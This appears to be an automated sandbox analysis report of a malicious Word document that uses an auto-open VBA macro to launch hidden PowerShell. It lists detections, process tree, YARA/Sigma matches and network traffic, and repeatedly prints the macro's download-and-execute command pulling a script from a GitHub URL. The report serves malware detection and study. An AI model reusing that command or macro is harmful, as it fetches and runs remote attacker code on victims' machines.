Windows Analysis Report RfORrHIRNe.doc

Overview

General Information

Sample Name: RfORrHIRNe.doc
Analysis ID: 515215
MD5: 955d5d2855b291a3cf1fc6655bbbbb79
SHA1: b58901cf8967310228bc6e4c224b2cfaf014bc65
SHA256: 63acfd6633bf3fe6462d8de72904338e2a97392654d8b39a97d18b9e7f3b25b8

Detection

Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Found detection on Joe Sandbox Cloud Basic with higher score
Antivirus detection for dropped file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Suspicious powershell command line found
Machine Learning detection for sample
Document contains an embedded VBA macro with suspicious strings
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Document has an unknown application name
May sleep (evasive loops) to hinder dynamic analysis
Stores large binary data to the registry
Document contains an embedded VBA macro which executes code when the document is opened / closed
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Uses insecure TLS / SSL version for HTTPS connection
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Document contains no OLE stream with summary information
Sigma detected: PowerShell Download from URL
Potential document exploit detected (unknown TCP traffic)
Document contains embedded VBA macros
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Potential document exploit detected (performs HTTP gets)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 1912 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • powershell.exe (PID: 2784 cmdline: Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3') MD5: 852D67A27E454BD389FA7F02A8CBE23F)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source: RfORrHIRNe.doc | Rule: PowerShell_in_Word_Doc | Description: Detects a powershell and bypass keyword in a Word document | Author: Florian Roth | Strings:
  • 0x72c7:$s1: Powershell.exe
  • 0x72f1:$s2: Bypass
Source: RfORrHIRNe.doc | Rule: PowerShell_Susp_Parameter_Combo | Description: Detects PowerShell invocation with suspicious parameters | Author: Florian Roth | Strings:
  • 0x72e0:$sb1: -W Hidden
  • 0x72d5:$sc1: -NoP
  • 0x72da:$sd1: -NonI
  • 0x72ea:$se2: -Exec Bypass
  • 0x72ea:$se4: -Exec Bypass

Dropped Files

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{A8188D20-C63E-41BC-839A-5E99E4F44AC7}.tmp | Rule: PowerShell_in_Word_Doc | Description: Detects a powershell and bypass keyword in a Word document | Author: Florian Roth | Strings:
  • 0x1f47:$s1: Powershell.exe
  • 0x1f71:$s2: Bypass
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{A8188D20-C63E-41BC-839A-5E99E4F44AC7}.tmp | Rule: PowerShell_Susp_Parameter_Combo | Description: Detects PowerShell invocation with suspicious parameters | Author: Florian Roth | Strings:
  • 0x1f60:$sb1: -W Hidden
  • 0x1f55:$sc1: -NoP
  • 0x1f5a:$sd1: -NonI
  • 0x1f6a:$se2: -Exec Bypass
  • 0x1f6a:$se4: -Exec Bypass
Source: C:\Users\user\AppData\Local\Temp\~DFB0DD1817E66C3CA2.TMP | Rule: PowerShell_in_Word_Doc | Description: Detects a powershell and bypass keyword in a Word document | Author: Florian Roth | Strings:
  • 0x151f:$s1: Powershell.exe
  • 0x1549:$s2: Bypass
Source: C:\Users\user\AppData\Local\Temp\~DFB0DD1817E66C3CA2.TMP | Rule: PowerShell_Susp_Parameter_Combo | Description: Detects PowerShell invocation with suspicious parameters | Author: Florian Roth | Strings:
  • 0x1538:$sb1: -W Hidden
  • 0x152d:$sc1: -NoP
  • 0x1532:$sd1: -NonI
  • 0x1542:$se2: -Exec Bypass
  • 0x1542:$se4: -Exec Bypass

Memory Dumps

Source: 00000002.00000002.435852554.00000000002D0000.00000004.00000020.sdmp | Rule: PowerShell_Susp_Parameter_Combo | Description: Detects PowerShell invocation with suspicious parameters | Author: Florian Roth | Strings:
  • 0x3039:$sb1: -W Hidden
  • 0x302e:$sc1: -NoP
  • 0x3033:$sd1: -NonI
  • 0x3043:$se2: -Exec Bypass
  • 0x3043:$se4: -Exec Bypass

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team | Data: Command: Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3'), CommandLine: Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3'), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 1912, ProcessCommandLine: Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3'), ProcessId: 2784
Sigma detected: PowerShell Download from URL
Source: Process started | Author: Florian Roth, oscd.community, Jonhnathan Ribeiro | Data: Command: Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3'), CommandLine: Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3'), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 1912, ProcessCommandLine: Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3'), ProcessId: 2784
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Source: Process started | Author: James Pemberton / @4A616D6573 | Data: Command: Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3'), CommandLine: Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3'), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 1912, ProcessCommandLine: Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3'), ProcessId: 2784
Sigma detected: Non Interactive PowerShell
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3'), CommandLine: Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3'), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 1912, ProcessCommandLine: Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3'), ProcessId: 2784

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: RfORrHIRNe.doc | Virustotal: Detection: 49%
Antivirus / Scanner detection for submitted sample
Source: RfORrHIRNe.doc | Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\~DFB0DD1817E66C3CA2.TMP | Avira: detection malicious, Label: HEUR/Macro.Agent
Machine Learning detection for sample
Source: RfORrHIRNe.doc | Joe Sandbox ML: detected
Source: unknown | HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.22:49169 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: System.Management.Automation.pdb | source: powershell.exe, 00000002.00000002.436424156.0000000002937000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbAlbu | source: powershell.exe, 00000002.00000002.436424156.0000000002937000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb | source: powershell.exe, 00000002.00000002.436424156.0000000002937000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon | source: powershell.exe, 00000002.00000002.436424156.0000000002937000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil | source: powershell.exe, 00000002.00000002.436424156.0000000002937000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb | source: powershell.exe, 00000002.00000002.436424156.0000000002937000.00000004.00000040.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: global traffic | DNS query: name: github.com
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 140.82.121.4:80
Source: global traffic | TCP traffic: 192.168.2.22:49168 -> 140.82.121.3:443
Source: Joe Sandbox View | JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: global traffic | HTTP traffic detected: GET /ssbb36/stv/raw/main/5.mp3 HTTP/1.1; Host: github.com; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /ssbb36/stv/main/5.mp3 HTTP/1.1; Host: raw.githubusercontent.com; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /ssbb36/stv/raw/main/5.mp3 HTTP/1.1; Host: github.com; Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 185.199.108.133
Source: Joe Sandbox View | IP Address: 140.82.121.3
Source: unknown | HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.22:49169 version: TLS 1.0
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown | Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49169 -> 443
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D1CEAA27-5E98-4FA5-88E5-2DF8BA910B6B}.tmp
Source: unknown | DNS traffic detected: queries for: github.com
Source: global traffic | HTTP traffic detected: GET /ssbb36/stv/raw/main/5.mp3 HTTP/1.1; Host: github.com; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /ssbb36/stv/main/5.mp3 HTTP/1.1; Host: raw.githubusercontent.com; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /ssbb36/stv/raw/main/5.mp3 HTTP/1.1; Host: github.com; Connection: Keep-Alive

System Summary:

Found detection on Joe Sandbox Cloud Basic with higher score
Source: RfORrHIRNe.doc | Joe Sandbox Cloud Basic: Detection: malicious, Score: 96
Document contains an embedded VBA macro with suspicious strings
Source: RfORrHIRNe.doc | OLE, VBA macro line: Shell ("Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3')")
Source: ~DFB0DD1817E66C3CA2.TMP.0.dr | OLE, VBA macro line: Shell ("Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3')")
Source: RfORrHIRNe.doc, type: SAMPLE | Matched rule: PowerShell_in_Word_Doc date = 2017-06-27, author = Florian Roth, description = Detects a powershell and bypass keyword in a Word document, reference = Internal Research - ME, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 4fd4a7b5ef5443e939015276fc4bf8ffa6cf682dd95845ef10fdf8158fdd8905
Source: RfORrHIRNe.doc, type: SAMPLE | Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: 00000002.00000002.435852554.00000000002D0000.00000004.00000020.sdmp, type: MEMORY | Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{A8188D20-C63E-41BC-839A-5E99E4F44AC7}.tmp, type: DROPPED | Matched rule: PowerShell_in_Word_Doc date = 2017-06-27, author = Florian Roth, description = Detects a powershell and bypass keyword in a Word document, reference = Internal Research - ME, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 4fd4a7b5ef5443e939015276fc4bf8ffa6cf682dd95845ef10fdf8158fdd8905
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{A8188D20-C63E-41BC-839A-5E99E4F44AC7}.tmp, type: DROPPED | Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: C:\Users\user\AppData\Local\Temp\~DFB0DD1817E66C3CA2.TMP, type: DROPPED | Matched rule: PowerShell_in_Word_Doc date = 2017-06-27, author = Florian Roth, description = Detects a powershell and bypass keyword in a Word document, reference = Internal Research - ME, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 4fd4a7b5ef5443e939015276fc4bf8ffa6cf682dd95845ef10fdf8158fdd8905
Source: C:\Users\user\AppData\Local\Temp\~DFB0DD1817E66C3CA2.TMP, type: DROPPED | Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: ~WRF{A8188D20-C63E-41BC-839A-5E99E4F44AC7}.tmp.0.dr | OLE indicator application name: unknown
Source: ~DFB0DD1817E66C3CA2.TMP.0.dr | OLE indicator application name: unknown
Source: RfORrHIRNe.doc | OLE, VBA macro line: Sub Autoopen()
Source: ~DFB0DD1817E66C3CA2.TMP.0.dr | OLE, VBA macro line: Sub Autoopen()
Source: ~WRF{A8188D20-C63E-41BC-839A-5E99E4F44AC7}.tmp.0.dr | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DFB0DD1817E66C3CA2.TMP.0.dr | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~WRF{A8188D20-C63E-41BC-839A-5E99E4F44AC7}.tmp.0.dr | OLE indicator has summary info: false
Source: ~DFB0DD1817E66C3CA2.TMP.0.dr | OLE indicator has summary info: false
Source: RfORrHIRNe.doc | OLE indicator, VBA macros: true
Source: ~DFB0DD1817E66C3CA2.TMP.0.dr | OLE indicator, VBA macros: true
Source: RfORrHIRNe.doc | Virustotal: Detection: 49%
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................@.k.....G..............................}..v....`H......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............O.u.t.F.i.l.e. .".e.n.d...v.b.s."...............}..v....pL......0...............h.T.....".......X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................@.k....(M..............................}..v.....M......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................#A.k......T.............................}..v....pT......0...............................X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................@.k....(U..............................}..v.....U......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n......Y......0...............h.T.....4.......X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................@.k.....Z..............................}..v.....[......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................#A.k......T.............................}..v....P`......0.......................l.......X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................@.k.....a..............................}..v.....a......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ .......#A.k......T.............................}..v.....e......0...............h.T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................@.k.....e..............................}..v....Pf......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#...............#A.k......T.............................}..v....."......0...............................X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#................@.k....`#..............................}..v.....#......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../...............#A.k......T.............................}..v.....*......0...............................X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../................@.k....`+..............................}..v.....+......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;...............#A.k......T.............................}..v....H1......0.......................~.......X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;................@.k.....2..............................}..v.....2......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G.......A.t. .l.i.n.e.:.4. .c.h.a.r.:.1.8...............}..v.....6......0...............h.T.....".......X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G................@.k....H7..............................}..v.....7......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S...............#A.k......T.............................}..v.....>......0...............................X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................0.......S.........................Y..... .......................}..v.....?...... .................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._.......u.t.F.i.l.e. .".h.s.t.a.r.t...v.b.s."...........}..v.....C......0...............h.T.....&.......X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._................@.k.....D..............................}..v.....E......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k...............#A.k......T.............................}..v.....K......0...............................X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k................@.k.....L..............................}..v.....M......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w....... . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....HQ......0...............h.T.....4.......X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w................@.k.....R..............................}..v.....R......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................#A.k......T.............................}..v.....W......0.......................l.......X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................@.k....xX..............................}..v.....X......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ .......#A.k......T.............................}..v.....\......0...............h.T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................@.k....@]..............................}..v.....]......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................#A.k......T.............................}..v............0...............................X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................@.k....................................}..v....(.......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................#A.k......T.............................}..v.....!......0...............................X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................@.k....."..............................}..v....(#......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................#A.k......T.............................}..v.....(......0.......................~.......X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................@.k....H)..............................}..v.....)......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............A.t. .l.i.n.e.:.5. .c.h.a.r.:.1.8...............}..v.....-......0...............h.T.....".......X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................@.k....................................}..v...../......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................#A.k......T.............................}..v.....5......0...............................X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................@.k.....6..............................}..v.....7......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............u.t.F.i.l.e. .".s.t.a.r.t...c.m.d.".............}..v.... ;......0...............h.T.....$.......X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................@.k.....;..............................}..v....X<......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................#A.k......T.............................}..v.... C......0...............................X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................@.k.....C..............................}..v....XD......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n......H......0...............h.T.....4.......X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................@.k....@I..............................}..v.....I......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................#A.k......T.............................}..v.....O......0.......................l.......X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................@.k.....O..............................}..v....8P......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ .......#A.k......T.............................}..v.....S......0...............h.T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................@.k.....T..............................}..v.....U......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................#o.k......T.............................}..v......!.....0...............................X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................n.k....................................}..v......!.....0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'.......n.n.o.t. .f.i.n.d. .t.h.e. .f.i.l.e. .s.p.e.c.i.f.i.e.d...!.....0...............h.T.....:.......X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'................n.k......!.............................}..v....x.!.....0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3.......A.t. .l.i.n.e.:.7. .c.h.a.r.:.1.4...............}..v......!.....0...............h.T.....".......X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3................n.k....@.!.............................}..v......!.....0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?...............#o.k......T.............................}..v....(.!.....0...............................X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?................n.k......!.............................}..v....`.!.....0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K...............#o.k......T.............................}..v....(.!.....0...............................X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K................n.k......!.............................}..v....`.!.....0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W....... . . .e.r.a.t.i.o.n.E.x.c.e.p.t.i.o.n...........}..v....x.!.....0...............h.T.....&.......X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W................n.k....0 !.............................}..v..... !.....0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c...............#o.k......T.............................}..v....x'!.....0...............................X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c................n.k....0(!.............................}..v.....(!.....0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o....... . . .o.m.m.a.n.d.s...S.t.a.r.t.P.r.o.c.e.s.s.C.o.m.m.a.n.d.....0...............h.T.....<.......X...............Jump to behavior
